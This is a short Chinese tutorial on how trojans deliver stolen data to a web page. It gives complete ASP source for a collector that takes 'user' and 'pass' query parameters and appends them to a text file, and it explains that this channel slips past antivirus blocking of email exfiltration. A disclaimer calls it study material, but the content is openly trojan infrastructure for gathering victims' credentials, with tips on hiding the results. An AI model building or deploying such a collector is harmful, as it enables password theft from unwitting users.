浅谈木马的ASP收信方式

声明:

            我写这篇文章的目的，完全是出于个人学习研究的目的，请读者不要借此干坏事，由此
引发的一切事件责任与本人无关。

            网上有铺天该地的木马，其中很多用的就是ASP收信方式，稍微懂点网页编程的人，

做一个用来接收用户信息的网页，不是一件难事。难的是客户端程序的编写，现在用邮箱收信，

已经被360和其它杀毒软件给无情地拦截了，相信网页收信方式是最好的形式，

毕竟360和其它杀毒软件等是不会拦截用户打开网页的(在黑名单的除外)，收集到信息后，

我们用程序在后台打开我们的网页即可。

        关于ASP收信文件的源代码，网上公布的很少，我找了下，一个都没有找到！翻了下
我的邮箱，不知什么时候(至少那时我还不会编程)，我留了份ASP收信的代码，这份代码
很简单，对于要求不高的初学者来说，拿来练手，是一件愉快的事情。高级一点的收信

方式是把用户信息写进数据库或一个需要验证的页面，这样别人就不可以轻易地查看到

你获取到的信息了。本例子中，只要别人知道了ok.txt的网络路径，就可以查看了，

呵呵，是不是该改进呀！...

        如果你要测试这份代码，可以用 小旋风ASP服务器 来搭建一个ASP环境，当然也可以在
网上申请免费的ASP空间，如 菲菲免费网站空间http://www.free888.org/


//ASP收信文件代码如下
<!-- 
'-------------------------------------------------------- 
' //为防止浏览器显示本ASP文件的注释，同时用了Html和ASP注释
'//假设本ASP文件的名字为：test.asp 
'//调用本文件的形式为:http://ip/test.asp?user=xxx&pass=xxx 
'//如:http://www.baidu.com/test.asp?user=123&pass=456 
' 
'-------------------------------------------------------- 
--> 
<% 
user=Request.QueryString("user") '保存用户提交的参数user 
pass=Request.QueryString("pass") '保存用户提交的参数pass  
set fs=Server.CreateObject("Scripting.FileSystemObject") '创建文件对象fs 
txtPath=Server.MapPath("ok.txt")  '设置要写入的文件的路径，该文件和本ASP文件在同一目录下面 
set tfile=fs.OpenTextFile(txtPath,8,True) '文件存在时就打开该文件，不存在时就创建该文件  
tfile.WriteLine "user=" &user&" ------> pass="&pass '将用户信息写入文件ok.txt 
tfile.close 
set tfile=nothing 
set fs=nothing 
%> 

为了方便我在本机用 小旋风ASP服务器 搭建好了ASP环境

//文件目录截图如下



//浏览器访问截图如下

//效果截图如下